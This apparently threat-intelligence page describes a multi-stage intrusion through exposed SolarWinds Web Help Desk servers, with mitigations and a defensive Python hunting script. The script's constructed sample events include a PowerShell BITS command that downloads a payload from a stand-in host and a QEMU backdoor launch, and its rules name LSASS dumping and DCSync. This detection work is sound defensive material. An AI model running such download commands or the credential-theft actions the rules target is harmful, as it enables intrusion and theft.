SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers
Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. That said, the Microsoft Defender Security Research Team said it's not clear whether the activity weaponized recently
AI Analysis
Technical Summary
Microsoft observed a multi-stage intrusion in which the attackers exploited internet-exposed SolarWinds Web Help Desk (WHD) instances for initial access and then moved laterally inside the victim network. Initial access was unauthenticated remote code execution against WHD. The candidate flaws present on the compromised hosts were two untrusted-data deserialization vulnerabilities (CVE-2025-40551 and CVE-2025-26399, both CVSS 9.8) and a security control bypass (CVE-2025-40536, CVSS 8.1); because the hosts were unpatched for more than one of these, the exact CVE that was exploited could not be determined.

After exploitation the attackers ran arbitrary commands in the context of the WHD application process, which spawned PowerShell to fetch payloads through the Background Intelligent Transfer Service (BITS). They deployed legitimate Zoho ManageEngine RMM components for persistent remote control, enumerated sensitive Active Directory users and groups, and set up reverse SSH and RDP for persistence. Two stealth techniques stand out: scheduled tasks that launch QEMU virtual machines under SYSTEM privileges so that backdoors run inside a guest rather than on the monitored host, and DLL side-loading through the legitimate Windows executable wab.exe to dump LSASS memory for credential theft. At least one DCSync attack was observed: using directory replication rights, the attacker requested account password hashes from a domain controller as though it were a replicating peer DC.

Other tooling included Velociraptor 0.73.4, which carries the known privilege escalation flaw CVE-2025-6264; Cloudflared tunnels as a redundant command-and-control channel with failover between C2 endpoints; and registry modifications that disabled Windows Defender and the Windows Firewall. Throughout, the attackers relied on legitimate administrative tools to keep persistence low-noise. Huntress researchers linked the infrastructure to earlier intrusions involving ToolShell exploitation and Warlock ransomware.
The campaign underscores the criticality of patching internet-facing SolarWinds WHD instances and monitoring for anomalous administrative tool usage and behavior-based indicators across identity, endpoint, and network layers.
Potential Impact
European organizations using SolarWinds Web Help Desk with internet-exposed instances face significant risk of initial compromise leading to full domain takeover. The exploitation enables attackers to execute arbitrary code without authentication, facilitating lateral movement, credential theft, and persistent remote access. Compromise of Active Directory through DCSync attacks can lead to widespread credential exposure, enabling attackers to access sensitive data, disrupt operations, or deploy ransomware. The use of legitimate administrative tools and stealthy persistence mechanisms complicates detection and response efforts. Disabling endpoint protection and firewall further increases exposure to follow-on attacks. The potential impact includes data breaches, operational disruption, reputational damage, and regulatory penalties under GDPR if personal data is compromised. Given the critical role of SolarWinds WHD in IT service management, exploitation can also disrupt IT support functions, exacerbating incident response challenges.
Mitigation Recommendations
1. Immediately identify and patch all SolarWinds Web Help Desk instances to a version that fixes CVE-2025-40551, CVE-2025-26399 and CVE-2025-40536, prioritizing those exposed to the internet, and treat any instance that was exposed while unpatched as potentially compromised.
2. Scan endpoints and servers for unauthorized RMM tooling such as Zoho ManageEngine components and remove or isolate any deployment that is not sanctioned.
3. Rotate all service and administrative account credentials, especially those with domain or elevated privileges; if DCSync is suspected, reset the krbtgt account password twice and rotate every account whose hash could have been replicated.
4. Implement network segmentation to isolate critical assets and limit lateral movement from compromised hosts; the WHD server should not be able to reach domain controllers or management networks.
5. Deploy behavior-based detection for living-off-the-land techniques: the WHD application process spawning PowerShell or cmd.exe, PowerShell or bitsadmin initiating BITS transfers, scheduled tasks or SYSTEM-level processes launching qemu-system binaries, and wab.exe opening handles to lsass.exe.
6. Monitor Active Directory for DCSync: Security event 4662 with access mask 0x100 and the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All control access rights requested by any principal that is not a domain controller machine account.
7. Harden endpoints so that Windows Defender and firewall settings cannot be disabled by unauthorized users (enable Defender Tamper Protection and enforce the settings by policy), and alert on writes to the Defender and FirewallPolicy registry keys.
8. Require multi-factor authentication (MFA) on all administrative accounts to reduce the value of stolen credentials.
9. Regularly audit and restrict remote access methods such as SSH, RDP and cloudflared tunnels; outbound tunnels from servers should be blocked by default.
10. Establish incident response playbooks specifically addressing SolarWinds WHD exploitation scenarios and conduct tabletop exercises to improve readiness.
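The detection points named in the technical summary and in recommendations 5 through 7 can be expressed as a handful of hunting rules. The script below is an added example, not detection logic from Microsoft, Huntress or SolarWinds: it applies one rule per technique to constructed, normalized event records (Sysmon EventID 1, 10 and 13 and Security 4662 field names). The WHD install path `WebHelpDesk`, the sample file paths, the account names and the 203.0.113.10 download host are assumptions; the replication-rights GUIDs and the registry values are the real Active Directory and Windows identifiers.

```python
"""Hunt rules for the WHD intrusion chain (added example, constructed input)."""

# Control access rights that grant directory replication. A principal that is
# not a DC machine account requesting these in a 4662 is the DCSync signature.
DRS_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DRS_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DRS_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {DRS_GET_CHANGES, DRS_GET_CHANGES_ALL, DRS_GET_CHANGES_FILTERED}

# Registry values whose modification disables Defender or the host firewall.
DEFENCE_REG_TARGETS = (
    r"\Windows Defender\DisableAntiSpyware",
    r"\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
    r"\FirewallPolicy\DomainProfile\EnableFirewall",
    r"\FirewallPolicy\StandardProfile\EnableFirewall",
    r"\FirewallPolicy\PublicProfile\EnableFirewall",
)

WHD_INSTALL_HINT = "WebHelpDesk"  # assumption: default install directory name
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


def whd_spawns_shell(e):
    """Sysmon 1: the WHD application process is the parent of a shell."""
    return (e.get("event_id") == 1
            and WHD_INSTALL_HINT.lower() in e.get("parent_image", "").lower()
            and e.get("image", "").lower().endswith(SHELLS))


def bits_download_from_shell(e):
    """Sysmon 1: a process command line drives BITS to fetch a payload."""
    cl = e.get("command_line", "").lower()
    return e.get("event_id") == 1 and ("start-bitstransfer" in cl or "bitsadmin" in cl)


def qemu_as_system(e):
    """Sysmon 1: a qemu-system binary running as SYSTEM (task-launched VM)."""
    return (e.get("event_id") == 1
            and "qemu-system" in e.get("image", "").lower()
            and e.get("user", "").upper() == "NT AUTHORITY\\SYSTEM")


def wab_touches_lsass(e):
    """Sysmon 10: wab.exe (hosting a side-loaded DLL) opens lsass.exe."""
    return (e.get("event_id") == 10
            and e.get("source_image", "").lower().endswith("\\wab.exe")
            and e.get("target_image", "").lower().endswith("\\lsass.exe"))


def defence_disabled_via_registry(e):
    """Sysmon 13: a value set under the Defender or FirewallPolicy keys."""
    tgt = e.get("target_object", "").lower()
    return e.get("event_id") == 13 and any(t.lower() in tgt for t in DEFENCE_REG_TARGETS)


def dcsync(e):
    """Security 4662: replication rights requested by a non-DC principal."""
    if e.get("event_id") != 4662 or e.get("access_mask") != "0x100":
        return False
    props = {p.lower() for p in e.get("properties", [])}
    subject = e.get("subject_user", "")
    # Legitimate DC-to-DC replication is done by machine accounts (name ends in '$').
    return bool(props & REPLICATION_GUIDS) and not subject.endswith("$")


RULES = [whd_spawns_shell, bits_download_from_shell, qemu_as_system,
         wab_touches_lsass, defence_disabled_via_registry, dcsync]


def hunt(events):
    """Return [(rule_name, event_index)] for every rule that fires on an event."""
    return [(rule.__name__, idx) for idx, e in enumerate(events) for rule in RULES if rule(e)]


# Constructed sample events mirroring the chain in the summary (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 1, "parent_image": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -nop -c Start-BitsTransfer -Source http://203.0.113.10/a.zip -Destination C:\Users\Public\a.zip",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"event_id": 1, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\ProgramData\qemu\qemu-system-x86_64.exe",
     "command_line": "qemu-system-x86_64.exe -m 2048 -hda backdoor.qcow2 -nographic",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"event_id": 10, "source_image": r"C:\Users\Public\wab.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "details": "DWORD (0x00000001)"},
    {"event_id": 4662, "subject_user": "svc_backup", "access_mask": "0x100",
     "properties": [DRS_GET_CHANGES, DRS_GET_CHANGES_ALL]},
    # Benign: genuine DC replication by a machine account.
    {"event_id": 4662, "subject_user": "DC02$", "access_mask": "0x100",
     "properties": [DRS_GET_CHANGES_ALL]},
    # Benign: a technician's interactive PowerShell from Explorer.
    {"event_id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Service", "user": r"CORP\jdoe"},
]

if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        print(f"{name:<28} event #{idx}")
```

Event 0 fires two rules (WHD parent spawning a shell, and that shell driving BITS); the two benign events fire none. In a real deployment the rules would run over an EDR or SIEM export rather than an inline list, and the `dcsync` rule should additionally exclude any accounts that are legitimately granted replication rights, such as Entra Connect sync accounts.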
Affected Countries
Germany, United Kingdom, France, Netherlands, Sweden, Italy, Spain, Poland
Technical Details
- Article Source: https://thehackernews.com/2026/02/solarwinds-web-help-desk-exploited-for.html (fetched 2026-02-10T11:16:38Z, 1472 words)
Threat ID: 698b13994b57a58fa1ff1300
Added to database: 2/10/2026, 11:16:41 AM
Last enriched: 2/10/2026, 11:17:36 AM
Last updated: 3/27/2026, 1:15:47 AM
Views: 131